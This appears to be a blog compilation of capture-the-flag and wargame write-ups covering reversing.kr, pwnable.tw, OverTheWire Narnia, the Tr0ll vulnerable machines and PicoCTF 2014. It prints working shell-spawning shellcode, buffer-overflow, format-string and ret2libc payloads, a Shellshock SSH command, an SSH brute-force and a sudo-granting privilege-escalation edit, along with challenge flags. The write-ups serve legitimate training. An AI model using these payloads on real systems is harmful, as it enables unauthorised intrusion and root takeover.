Reversing.kr Write-Up

What follows is a write-up of a reverse engineering war game series, reversing.kr.

The war games have players reverse Windows, Linux, and macOS binaries. The players get a flag if they succeed in compromising the application.

Showing gratitude to the creators of the war game, I will abide by their rules and only publish the solution to those challenges that already have other solutions online. I will not post solutions to challenges that no one else has solved publicly.

[!] Friendly Warning: Some of the binaries are malicious. Some of these are: Easy Unpack, Ransomware, and Twist1. Do not run these binaries outside a sandbox.

[*] Status: IN-PROGRESS

Level 0: Easy Crack

Solution

Inspecting the file in Binary Ninja:

Initially I was going to use Binary Ninja to complete the challenge. However, as you can see, it shines very little light on the program. Hence, I decided to use IDA.

Inspecting the file with IDA:

Notice the push to the lpDialogFunc.

Inspecting lpDialogFunc:

The sub_401080 function might be interesting.

Inspecting the sub_401080 function:

Notice straightaway that we see the text “a5yR3versing”.
There’s a letter “E” missing in there somewhere.

The missing “E” can be found further below, in a comparison to its hex equivalent, 0x45.
It looks like I have the flag.

Flag: Ea5yR3versing

Proof:

 

Level 1: Easy Keygen

Instructions

Find the Name when the Serial is 5B134977135E7D13

Solution

Inspecting the file with IDA:

Note that there is an array of three integers (16, 32, 48), and that the username (input name) is eight (8) characters long.

Renamed for convenience:

loc_401077:
ESI is compared against 3.
If it’s less than three, it jumps to loc_40107E
If it’s greater than three, ESI is cleared by XOR.

ESI is clearly the counter that cycles through the three integers.

Throughout this process, the username is being XOR’ed against the three integers:
16, 32, and 48

Since the goal is to find the name given the serial number, we can use repeating-key XOR decryption using the integer array and the serial number to find the name.

Crafting the solution:

Getting the answer:
python keygen.py

Proof:

 

Level 2: Music Player

Instructions

This MP3 Player is limited to 1 minutes.
You have to play more than one minute.

There are exist several 1-minute-check-routine.
After bypassing every check routine, you will see the perfect flag.

Solution

Several clues are given right off the bat.

The goal: To bypass the 1-minute play limit.

To do this, we have to bypass “several” check routines.

Since the challenge does not provide any MP3 file, I searched for a random sample online.

Running the player:

The player pukes out an error, which is probably in Korean and is not displaying properly.

Inspecting the file with IDA:

0EA60H translates to 60000 (milliseconds), which translates to 60 seconds.
We have discovered the first check to bypass.

Further down, we find the following:

This looks like part of a flag?

The other check to bypass can be found further below:

We will bypass these by changing the instructions to simple JMP instructions.

Changing the instructions using Immunity Debugger:

Bypass the first check:

Bypass the second check:

Save the modified executable:

Right-click in the CPU pane -> Copy to executable -> All modifications
Right-click in the File pane -> Save file -> Name to whatever

Running the modified executable:

Flag: LIstenCare

Proof:

 

Level 3: Replace

Solution

Running the file:

The program crashes upon entering a number and hitting “Check”.

Inspecting the file with OllyDbg and IDA:

The challenge is titled “Replace”, and there are multiple references to a “Replace” function.
Just as in the previous challenges, this probably means we are going to have to modify instructions.

0040103D . 74 56 JE SHORT Replace.00401095

This jumps past the address which has the “Correct!” string.
So, it makes sense to follow the tip to replace that instruction.

Let’s NOP it.

Replacing 401095 with NOPs:
Double-click on 401095 -> Check “Fill with NOP’s” -> Enter “NOP” -> Assemble

Checking the program:
Enter “1” and press “Check”.

The program crashes, as expected.

Notice the value in EAX: 601605CC

Repeating the process with “2”, “3”, etc. reveals a pattern.

With 2: 
With 3:

Pattern:
601505CB + <Input> = EAX value

Whatever value is in EAX has two bytes overwritten by NOPs.
Coincidentally, the OPCODE for 0x401071, which jumps over the “Correct” section, is two bytes long.

The solution is to overwrite 0x401071, so we can slide into “Correct”.

The simple math behind the solution:
x + 601605CB = 401072
x = (401072 – 601605CB) + FFFFFFFF
x = A02A0AA6
x in decimal = 2687109798

Entering the result into the program:

Flag: 2687109798

Proof:

 

Level 4: ImagePrc

Solution

Running the file:

The program lets us draw and check if the drawing is the correct answer.

Inspecting the file with IDA Pro:

96h = 150 (height)
0C8h = 200 (width)

These are the height and width of the target BMP image.

We also see:

From this we know that the target image is 200×150, and that it is being loaded from the binary as a resource.

Creating an empty BMP file:

We save it as a 24-bit Bitmap file.

Inspecting the resource:

Pasting this should give us the answer.
Since it proved hard to copy the contents from IDA, I decided to use the ResourcesExtract software to extract the file.

Extracting the resource:

The extract gives us a manifest file. Opening the manifest file reveals that we have everything we need to solve the challenge.

Copying the resource contents using HxD:

Pasting the contents into the BMP file and saving:

Note that we replace everything but the header.

The modified file:

Flag: GOT

Proof:

 

Level 5: Position

Instructions

ReversingKr KeygenMe

Find the Name when the Serial is 76876-77776
This problem has several answers.

Password is ***p

Solution

Running the program:

The program takes in a name and a serial number (76876-77776).
We are provided with the serial number and have to find the name.
We know that the solution ends with the letter “p”.

Inspecting the binary with IDA Pro:

A call to loc_401CF0 determines the outcome – whether the inputs are correct or not.

This loop checks for the first four characters of the name being lowercase letters (a-z).

Several checks follow:
First, the program checks for the letters in the name being different.
Second, it checks for the serial being 11 characters long, and the fifth character being “-“.
Finally, a lengthy comparison routine occurs which leads to our solution.

The lengthy routine seems complicated at first, but is actually quite simple as long as you keep track of assignments.

CString Reference:
GetAt: https://msdn.microsoft.com/en-us/library/aa314338(v=vs.60).aspx
GetBuffer: https://msdn.microsoft.com/en-us/library/aa314880(v=vs.60).aspx

The easiest way to solve this is to write code as we read along.

Translation of Assembly to Python:

Running the solution program:

Since we know the password ends with “p”, the following are the possible options:
bump
cqmp
ftmp
gpmp

Flag: bump

Proof:

 

Level 6: Direct3D_FPS

Solution

This time we are playing a First Person Shooter (FPS), where we get to kill, or rather get killed, by enemies.

Inspecting the binary with IDA Pro:

This is the function that is triggered when we win the game. It outputs the flag, which starts at byte_407028.
We can confirm this is true by also looking at the binary in Immunity Debugger, as seen below.

Reading the flag and measuring it:
Ctrl-C the flag in Immunity Debugger.
Open a terminal and use Python to measure the length of the encrypted flag.

We can see that the flag is encrypted, and that it is 50 bytes in size.

Checking cross-references to the flag:
Ctrl-X to list cross-references.

Analyzing the function that references the flag:

The function performs the following calculation for each character in the flag:
xor_offset + (char * 0x210)
char_offset ^ xor_offset

Where:
xor_offset = 409184 + char
char_offset = 407028 + char

To be able to solve this it is necessary to set a breakpoint and run the program in a debugger.
We can do all of this within IDA.

Setting the breakpoint:
Set a breakpoint at: mov dword_CC9194[ecx], 0

Now we have to run the program and commit suicide. We hit the breakpoint when we commit suicide, as our HP hits 0.

Running the program and executing our code:
Choose a debugger in IDA -> Hit the “Play” icon.
Commit suicide in the game by running into an enemy and staying there until HP hits zero.

Run the following Python code within IDA:
xor_offset = <TBD>
char_offset = <TBD>
print bytearray([(Byte(char_offset + i) ^ Byte(xor_offset + (i * 0x210)) ) for i in range(50)])

In my case:
char_offset = 0xCC7028
xor_offset = 0xCC9184

Flag: Thr3EDPr0m

Proof:

 

Level 7: Easy ELF

 

Solution

Run the program:
chmod u+x Easy_ELF
gdb -q ./Easy_ELF
r

Analyzing the program in Binary Ninja:

We can see that the functions that determine the outcome are sub_8048434 and sub_8048451.

Analyzing sub_8048434:

No checks here. Moving on.

Analyzing sub_8048451:

Translation:
first_char ^ 34
second_char = 31
third_char ^ 32
fourth_char ^ ffffff88
fifth_char = 58

Translation:
third_char = 7c
first_char = 78
fourth_char = dd

Solution:
78 ^ 34
second_char = 31
7c ^ 32
dd ^ 88
fifth_char = 58

Crafting the solution:
vi easy_elf.py

Solving the challenge:
python easy_elf.py

Flag: L1NUX

Proof:

 

Level 8: WindowsKernel

Instructions

Please authenticate to lowercase.

Solution

…

Pwnable.tw Write-Up

What follows is a write-up of a system exploitation war game series, Pwnable.tw.

The war games have players try to compromise different servers, websites, devices, and applications.  The players get a flag if they succeed in compromising the system.

Showing gratitude to the creators of the war game, I will abide by their rules and only publish the solution to those challenges that already have other solutions online. I will not post solutions to challenges that no one else has solved publicly. I will also not show the flags.

[*] Status: IN-PROGRESS

Level 0: start

Instructions

Running at : nc chall.pwnable.tw 10000

Solution

Inspect the file:
Open the file in Binary Ninja
Options -> Medium Level IL
Right-click lines 5 and 9 -> Display As -> Signed Decimal

Looking a the Assembly, we can determine the following:

Syscall reference: http://syscalls.kernelgrok.com/

The linear disassembly shines further light on the right path:

We have to execute a simple two-stage attack.

First Stage:
Leak the address of the stack.

Second Stage:
Inject our shellcode in the leaked stack address.

Shellcode (Execve /bin/sh – 25 bytes):
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

The following code carries out our strategy:

Pwn the service:
python start_kill.py

 

Level 1: orw

Instructions

Read the flag from /home/orw/flag.

Only open read write syscall are allowed to use.

nc chall.pwnable.tw 10001

Solution

Inspect the file:
Open the file in Binary Ninja
Options -> Medium Level IL

This binary is pretty straightforward. It will take and execute our shellcode.
In order to read the flag, we simply have to follow the instructions:
Open -> Read -> Write the flag file.

Craft the exploit:

We come with the following high-level code:
char *fn = “/home/orw/flag”;
sys_open(fn, 0, 0);
sys_read(3, fn, 0x30);
sys_write(1, fn, 0x30);

We will refer to the handy Linux Syscall Reference to learn what Assembly instructions we need.

The above translates to the following Assembly instructions:
xor ecx,ecx                  ; clear the ecx registry
mov eax, 0x5               ; sys_open
push ecx                       ; push a NULL value unto the stack
push 0x67616c66       ; galf (flag)
push 0x2f77726f        ; /wro (orw/)
push 0x2f656d6f        ; /emo (ome/)
push 0x682f2f2f         ; h/// (///h)
mov ebx, esp               ; move contents to ebx
xor edx, edx                ; clear the edx registry
int 0x80                        ; interrupt, call the kernel to execute the syscall

mov eax, 0x3              ; sys_read
mov ecx, ebx              ; contents of the flag file
mov ebx, 0x3              ; fd
mov dl, 0x30               ; decimal 48, used for the interrupt
int 0x80                        ; interrupt, call the kernel to execute the syscall

mov eax, 0x4              ; sys_write
mov bl, 0x1                 ; decimal 1, used for the interrupt
int 0x80                        ; interrupt, call the kernel to execute the syscall

Python exploit code:

Pwn the service:
python orw_kill.py

 

Level 2: calc

Instructions

Have you ever use Microsoft calculator?

nc chall.pwnable.tw 10100

calc

Solution

 

 

OverTheWire – Narnia Write-Up

What follows is a write-up of a binary exploitation war game, OverTheWire Behemoth.

The war game introduces players to the basics of binary exploitation. Players get to exploit vulnerabilities such as plain vanilla buffer overflows, shellcode injection via environment variables, and more.

[*] STATUS: COMPLETED

Level 0

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia0

Notice that there is a 20-byte buffer, and that if we enter 0xdeadbeef we get a shell.

Performing a buffer overflow to get a shell:
python -c “print (‘a’ * 20) + ‘\xef\xbe\xad\xde\x88′”
./narnia0

Grabbing the flag:
cat /etc/narnia_pass/narnia1

Flag: efeidiedae

Techniques used: Local buffer overflow

 

Level 1

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia1.c

Notice the line: ret = getenv(“EGG”)
What this means is we have to set an environment variable titled “EGG” and pass it shell-spawning shellcode.

Setting the environment variable:
export EGG=$’\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80′

Running the binary:
./narnia1

Grabbing the flag:
cat /etc/narnia_pass/narnia2

Flag: nairiepecu

Techniques used: Environment variable overwrite

 

Level 2

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia2.c

Notice the 128-byte buffer. The solution is another buffer overflow.

Determining the offset to control the Extended Instruction Pointer (EIP):
gdb -q ./narnia2
r $(python -c “print (‘a’ * 140) + (‘b’ * 4)”)

We have correctly determined the offset, which is evidenced by the program crashing with our b’s.
The total size of the exploit will be 144 bytes.

We now have to insert the shellcode and determine an address that will point back to the start of our shellcode.
Since our shellcode is 25 bytes long, we will  pad our exploit with 115 characters, followed by the shellcode and four b’s. The four b’s will serve as a check that we still control EIP.

Seeking the correct address to jump back to the shellcode:
r $(python -c “print (‘a’ * 115) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘b’ * 4)”)

x/150x $esp

Notice that after examining 150 words (four bytes per word) into ESP, we can see the start of our shellcode.
To be on the safe side and ensure that the full shellcode is run, we will select 0xffffd880 as our address to jump back to.
We will replace the four b’s with the address to jump back to.

Testing the exploit:
r $(python -c “print (‘a’ * 115) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘\x80\xd8\xff\xff’)”)

Success. Time to run the exploit outside GDB.

Running the exploit:
./narnia2 $(python -c “print (‘a’ * 115) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘\x80\xd8\xff\xff’)”)

Grabbing the flag:

Flag: vaequeezee

Techniques used: Local buffer overflow

 

Level 3

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia3.c

The goal is to copy the contents of ifile (which will have the password to the next level) to ofile, which will be a file we can read.

We will be using a combination of buffer overflow with symbolic links.

Creating our flag container:
touch /tmp/narnia4_pass

Creating directories that will perform the buffer overflow:
cd /tmp
cd ./$(python -c “print ‘A’ * 27”)

The buffer is 32-bytes big, and so 27 A’s plus /tmp/ == 32
This allows us to overwrite the ofile and set it to any path we want

Creating the symbolic link between the real flag file and a second flag container:
ln -s /etc/narnia_pass/narnia4 ./narnia4_pass

This second flag container and the whole directory structure is done simply to cause an overflow. When we run the program, the first flag container (/tmp/narnia_pass) will be the file where the original file will be copied to.

Running the program to perform the copy operation:
/narnia/narnia3 $(python -c “print (‘/tmp/’) + (‘A’ * 27) + (‘/tmp/narnia4_pass’)”)

Reading the contents of our flag container:
cat /tmp/narnia4_pass

Flag: thaenohtai

Techniques used: Local buffer overflow via directory structure; symbolic links

 

Level 4

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia4.c

Notice that this will be another simple buffer overflow challenge.
strcpy copies whatever we pass to the application as arguments into the buffer.
Hence, we just have to overflow the buffer and use some shellcode to gain a shell.

Determining the offset to control the Extended Instruction Pointer (EIP):
gdb -q ./narnia4
r $(python -c “print (‘a’ * 270) + (‘b’ * 4)”)

We almost gained control of EIP on the first shot. Let’s readjust and confirm control.

Readjusting to gain control of EIP:
r $(python -c “print (‘a’ * 272) + (‘b’ * 4)”)

Excellent. Time to put in the shellcode and determine the return address.

Seeking the correct address to jump back to the shellcode:
r $(python -c “print (‘a’ * 247) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘b’ * 4)”)

x/300x $esp

Notice that after examining 300 words into ESP, we can see the start of our shellcode.
To be on the safe side and ensure that the full shellcode is run, we will select 0xffffd880 as our address to jump back to.
We will replace the four b’s with the address to jump back to.

Testing the exploit:
r $(python -c “print (‘a’ * 247) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘\x80\xd8\xff\xff’)”)

Success. Let’s run the exploit outside of GDB now.

Running the exploit:
./narnia4 $(python -c “print (‘a’ * 247) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘\x80\xd8\xff\xff’)”)

Grabbing the flag:
cat /etc/narnia_pass/narnia5

Flag: faimahchiy

Techniques used: Local buffer overflow

 

Level 5

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia5.c

Notice no format parameter was included for the function snprintf().
For this challenge we will do attack.

Notice that the goal is to make i be 500. We will use format specifiers to achieve this goal.

Key specifiers:
%x    : To print hex values
%n    : To write the amount of characters printed so far
.    : To ensure integers (written in decimal)

Determining where our input starts:
gdb -q ./narnia5
r $(python -c “print (‘A’ * 4) + (‘%x’ * 5)”)

Input address: 0xffffd6bc

Testing the format string attack in GDB:
r $(python -c ‘print(“\xbc\xd6\xff\xff”)’)%.496x%5\$n

Success. Time to run the exploit.

Running the exploit:
./narnia5 $(python -c ‘print(“\xcc\xd6\xff\xff”)’)%.496x%5\$n

Grabbing the flag:
cat /etc/narnia_pass/narnia6

Flag: neezocaeng

Techniques used: Format string attack

 

Level 6

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia6.c

Notice that we have two 8-byte buffers.
Also notice the inclusion of stdlib.
For this challenge, we will attempt a return-to-lib (ret2lib) attack.

Since stdlib includes everything (meaning it also includes system), we can return to the library and have system run /bin/sh

Testing the theory in GDB:
gdb -q ./narnia6
br *main
r aaaa bbbb
p system

Address of system: 0xf7e60e70

We have all the information we need to run the attack.
Since the program takes two arguments, we will run two Python instances.

Running the exploit:
./narnia6 $(python -c “print (‘a’ * 8) + ‘\x70\x0e\xe6\xf7′”) $(python -c “print (‘a’ * 8) + ‘/bin/sh'”)

Grabbing the flag:
cat /etc/narnia_pass/narnia7

Flag: ahkiaziphu

Techniques used: Return-to-lib (ret2lib)

 

Level 7

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia7.c

The goal is to overwrite goodfunction() with hackedfunction().
We will attempt to do a format string attack.

Running the program in GDB:
gdb -q ./narnia7
r a

ptrf()             = 0x80486e0 (0xffffd62c)
goodfunction()     = 0x80486e0
hackedfunction()     = 0x8048706

Determining our offset:
disas vuln
br *vuln+190
r bbbb

Offset: 6

Running a test with %x also confirms that the program possesses format string vulnerabilities.

We will use the “Magic Formula” to calculate our format string exploit.

As seen above, the formula works by splitting the target four bytes into two chunks (two high-order bytes and two low-order bytes), and using the #$ and %hn tokens to place the values in the right place.

By leveraging this formula, we can pick specific memory locations within the application and overwrite values.

I learned about this formula thanks to Daniel Regalado and his book: Gray Hat Hacking (Fourth Edition).

Using the formula:
Addresses:
ptrf()             = 0x80486e0 (0xffffd62c)
goodfunction()     = 0x80486e0
hackedfunction()     = 0x8048706

Calculations:
[addr + 2][addr]     = 0xffffd62c + 2                 = \x2e\xd6\xff\xff\x1c\xd6\xff\xff
%.[HOB – 8]x         = 0x0804 – 8 = 7FC(2044)         = %.2044x
%[offset]$hn                                     = %6\$hn
%.[LOB – HOB]x       = 0x8706 – 0804 = 7F02(32514)     = %.32514x
%[offset + 1]$hn                                 = %7\$hn

Running the exploit:
./narnia7 $(python -c’print(“\x2e\xd6\xff\xff\x1c\xd6\xff\xff”)’)%.2044x%6\$hn%.32514x%7\$hn

Grabbing the flag:
cat /etc/narnia_pass/narnia8

Flag: mohthuphog

Techniques used: Format String Attack Magic Formula

 

Level 8

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia8.c

The key to this challenge is a buffer overflow.
Notice that the program takes our argument as blah (without any size limitations), and sets bok (with a size of 20 bytes) to the contents of blah. This clearly shows the possibility of a buffer overflow.

Disassembling the program:
gdb -q ./narnia8
disas func

Understanding the program:
br *func+122
r $(python -c ‘print “a” * 20’)
x/50x $esp

Notice the address 0xffffd8a5 appears twice. This is potentially blah’s address. Remember that bok equals to blah.
The return address (which we want to overwrite) must then be 0x080484cd
Let us repeat the process and confirm.

Confirming the theory:
r $(python -c ‘print (“a” * 20) + (“b” * 4) + (“c” * 4)’)
x/50x $esp

Notice that the theory appears to be right. Performing an overflow actually overwrote the first instance of the blah address.

Also notice that the address of blah changed, now to: 0xffffd89d

In order to be able to overwrite the return address (0x080484cd), we are going to have to overwrite blah with itself.

Testing the blah overwrite theory:
r $(python -c ‘print (“A” * 20) + (“\x9d\xd8\xff\xff”)’)
x/50x $esp

The address changed, so let’s try again with the new address.

r $(python -c ‘print (“A” * 20) + (“\xa1\xd8\xff\xff”)’)
x/50x $esp

Success. Notice that our offset is then 12 words in.

Confirming the overwrite method:
r $(python -c ‘print (“a” * 20) + “\xa1\xd8\xff\xff” + (“a” * 12) + (“b” * 4)’)
x/50x $esp

We have to try again with the new address.

r $(python -c ‘print (“a” * 20) + “\x91\xd8\xff\xff” + (“a” * 12) + (“b” * 4)’)
x/50x $esp

Success! We have overwritten the return address with our b’s.

To make life easier for ourselves, we will use shellcode injection via environment variables to store our shellcode.
We will also use a C program to determine the location of our shellcode (SC).

Before we do that, however, we will first simulate this technique within GDB.
We will go through the process again in order to determine the new addresses.
Since our SC is 25 bytes long, our fake SC will be 25 bytes long as well.

Simulating our environment variable technique within GDB:
set env EGG=AAAAAAAAAAAAAAAAAAAAAAAAA
r $(python -c ‘print “A” * 20’)
x/50x $esp

Notice the address of blah: 0xffffd887

r $(python -c ‘print (“A” * 20) + “\x95\xdf\xff\xff” + (“A” * 12) + “\xfe\xca\xbe\xba”‘)
x/50x $esp

We have to try again with the new address.

r $(python -c ‘print (“A” * 20) + “\x81\xdf\xff\xff” + (“A” * 12) + “\xfe\xca\xbe\xba”‘)
x/50x $esp

Success.

Now, we’ll run the program outside of GDB to note the size of the difference inside and outside of GDB.
This is important in order to choose the proper address to deliver the final working exploit.

Determining the blah address outside of GDB:
env -i PWD=”/games/narnia” SHLVL=0 EGG=$(python -c ‘print(“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80”)’) /narnia/narnia8 $(python -c ‘print “A” * 20’) | xxd

Inside GDB    –    Outside GDB    =
————————————————–
ffffdf9b        –    ffffdf95        = 6

New blah address
—————————————
ffffdf81     +    6    = ffffdf87

Creating a program to determine the address of our shellcode inside the environment variable:
cd tmp
vi gev.c
gcc gev.c -o getenvaddr

Running the program:
cd /narnia
env -i PWD=”/games/narnia” SHLVL=0 EGG=$(python -c ‘print(“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80”)’) /tmp/getenvaddr EGG /narnia/narnia8

The SC address is: ffffdfce

Running the exploit:
env -i PWD=”/games/narnia” SHLVL=0 EGG=$(python -c ‘print(“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80”)’) /narnia/narnia8 $(python -c ‘print (“a” * 20) + “\x87\xdf\xff\xff” + (“b” * 12) + “\xce\xdf\xff\xff”‘)

Grabbing the flag:
cat /etc/narnia_pass/narnia9

Flag: eiL5fealae

Techniques used: Local buffer overflow; shellcode injection via environment variables

 

Level 9

Solution:

Receiving congratulations:

Note: The above doesn’t comment doesn’t apply anymore, as write-ups are spread out all over the web!
Note to creators: Let me know if otherwise, and I will take the write-up down. Thanks for the fun!

Tr0ll Write-Up

What follows is a write-up of two vulnerable machines, Tr0ll 1 and Tr0ll 2.

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs.

The goal is simple, gain root and get Proof.txt from the /root directory.

[*] STATUS: COMPLETED

Tr0ll 1 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
”’
Note the following ports and services are up and running:
ftp vsftpd 3.0.2
ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.4.7 ((Ubuntu))

”’

2) nikto -h 192.168.189.197
# It found a ‘/secret/’ directory mentioned in robots.txt which might be interesting
3) Browse to: 192.168.189.197
# Got trolled. Nice one.
# Let’s try attacking through ftp

4) ftp 192.168.189.197 -> anonymous:anonymous
# We’re in
5) ls -> get lol.pcap -> exit
6) strings lol.pcap
# Note: you almost found the sup3rs3cr3tdirlol 😛
7) Browse to: http://192.168.189.197/sup3rs3cr3tdirlol/
8) Download the binary
9) strings roflmao
# Note: Find address 0x0856BF to proceed
10) Browse to: http://192.168.189.197/0x0856BF/
11) Click on ‘good_luck’ -> which_one_lol.txt
12) wget http://192.168.189.197/0x0856BF/good_luck/which_one_lol.txt
12) Click on ‘this_folder_contains_the_password/’ -> Pass.txt
# Note: Either ‘Pass.txt’ or its contents ‘Good_job_:)’ could be the password
13) medusa -U which_one_lol.txt -p Pass.txt -h 192.168.189.197 -M ssh
# We found our way in
14) ssh overflow@192.168.189.197 -> Pass: Pass.txt
# We’re in
15) cat root/Proof.txt
# Permission denied, we’re going to have to do privilege escalation
16) find / -perm -o+w
# Searching for world writable files
# That /lib/log/cleaner.py file near the end looks interesting
17) vi /lib/log/cleaner.py
Modify the try:
os.system(‘usermod -aG sudo overflow’)

# Initially the modification didn’t seem to work, but by the third log on
# (it kept kicking us out) we finally became a sudoer
18) id
# Became a sudoer
19) sudo ls /root
20) sudo cat /root/proof.txt
# Got the flag

Flag: 702a8c18d29c6f3ca0d99ef5712bfbdc

End-Notes:
Pretty funny box, though slightly annoying when it kept logging us out. Fun overall.

 

Tr0ll 2 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
”’
Note the following ports and services are up and running:
ftp vsftpd 2.0.8 or later
ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.2.22 ((Ubuntu))

Also notice that there were two network adapters. Perhaps some chaining?

”’

2) Browse to: 192.168.189.204
3) nikto -h 192.168.189.204
”’
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15.

”’

4) wfuzz –hc 404 -c -z file,/usr/share/wfuzz/wordlist/general/big.txt http://192.168.189.204/FUZZ
# Fuzzing for directories – only index came up

5) Browse to: http://192.168.189.204/robots.txt

6) wfuzz –hc 404 -c -z file,/root/Documents/wargames/tr0ll/list.txt http://192.168.189.204/FUZZ

”’
Out of all the URLs only the following seem to work:
http://192.168.189.204/noob/
http://192.168.189.204/keep_trying/
http://192.168.189.204/dont_bother/
http://192.168.189.204/ok_this_is_it/

The filename of the images is: cat_the_troll
”’

7) Download all the images
8) tail -n 1 cat_the_troll.jpg cat_the_troll.jpg.1 cat_the_troll.jpg.2 cat_the_troll.jpg.3
# Notice on the third image (dont_bother) we get:
# Look Deep within y0ur_self for the answer

9) Browse to: http://192.168.189.204/y0ur_self/
10) wget http://192.168.189.204/y0ur_self/answer.txt
11) cat answer.txt | base64 -d > the_answer.txt
12) gedit the_answer.txt
# It’s a bunch of repeated words
13) uniq -u the_answer.txt > answerz.txt
14) gedit answerz.txt
# Notice the following string: ItCantReallyBeThisEasyRightLOL
# After trying it on the web app, ftp, and ssh, I decided to move on
15) ftp 192.168.189.204 -> Tr0ll:Tr0ll
# It was this easy

16) ls -> get lmao.zip -> exit
17) unzip lmao.zip
# It’s password encrypted
# The password is: ItCantReallyBeThisEasyRightLOL

18) file noob
# noob: PEM RSA private key
# This might very well be to log in via ssh

19) ssh noob@192.168.189.204 -i noob
# It prints out “TRY HARDER LOL!” and closes the connection
# Looks like it’s forcing this command (echo) to be run once we log in

20) Search for ‘ssh exploit’
21) Read: http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
# We can use the shellshock exploit to run other commands

22) ssh noob@192.168.189.204 -i noob ‘() { :;}; /bin/bash’
23) id
# We’re in
24) pwd -> cd ../ -> ls -> ls tr0ll
# There’s a lmao.zip
25) cd / -> ls -> ls nothing_to_see_here -> ls nothing_to_see_here/choose_wisely
26) cd nothing_to_see_here/choose_wisely
27) ls door1 -> ls door2 -> ls door3
28) file door1/r00t -> file door2/r00t -> file door3/r00t
”’
After running all three files, we get the following:
– door1 r00t lets us input data
– door2 prints:
Good job, stand by, executing root shell…
BUHAHAHA NOOB!

– door3 r00t prints: 2 MINUTE HARD MODE LOL, and then bricks the system

Let’s go with door1. Binary exploitation?
”’

29) cd door1
30) gdb -q ./r00t
31) run $(python -c ‘print “A” * 500’)
# We get a segmentation fault
32) run $(python -c ‘print “A” * 300’)
33) run $(python -c ‘print “A” * 200’)
34) run $(python -c ‘print “A” * 250’)
35) run $(python -c ‘print “A” * 270’)
36) run $(python -c ‘print “A” * 268 + “B” * 4’)
# We control EIP

37) disas main
38) br *main+97
# Setting a breakpoint at leave
39) run $(python -c ‘print “A” * 268 + “B” * 4′)
40) x/100x $esp
”’
Notice where our A’s start
We can now load and run our shellcode

Let’s use execve /bin/sh shellcode I wrote, which is 25 bytes in size
”’

41) run $(python -c ‘print “A” * 268 + “\x80\xfb\xff\xbf” + “\x90” * 20 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘)
# Confirming it works

42) ./r00t $(python -c ‘print “A” * 268 + “\x80\xfb\xff\xbf” + “\x90” * 20 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘)

43) whoami
44) cat /root/Proof.txt
# Got the flag

Flag: a70354f0258dcc00292c72aab3c8b1e4

End-Notes:
Fun box!

PicoCTF 2014 Write-Up

What follows is a write-up of a Capture the Flag competition set up by Carnegie Mellon University, PicoCTF 2014.

Competitors were given a set of challenges which they had to complete to get a flag.

The categories included:

• Cryptography
• FBI
• Forensics
• Misc
• Pwning
• Reversing
• Web

[*] Note 1: Written in the order completed.
[*] Note 2: I competed in this CTF by myself.

Miscellaneous – Tyrannousaurus Hex (10)

The contents of the flash drive appear to be password protected. On the back of the flash drive, you see the hexadecimal number 0xac06e9ba scribbled in ink. The password prompt, however, only accepts decimal numbers. What number should you enter? (Press the Hint button for advice on solving the challenge).

Solution:
# See format_convert.py
./format_convert.py 1d39f3a -2dec
Input: 30646074

Flag: 30646074

Miscellaneous – RoboPhoto (30)

Your father has been known to use the titles of his favorite books as passwords. While you don’t remember any of the names of the books, your father keeps a poster for one of them on his wall. Can you figure out the name of the book and unlock the CD?

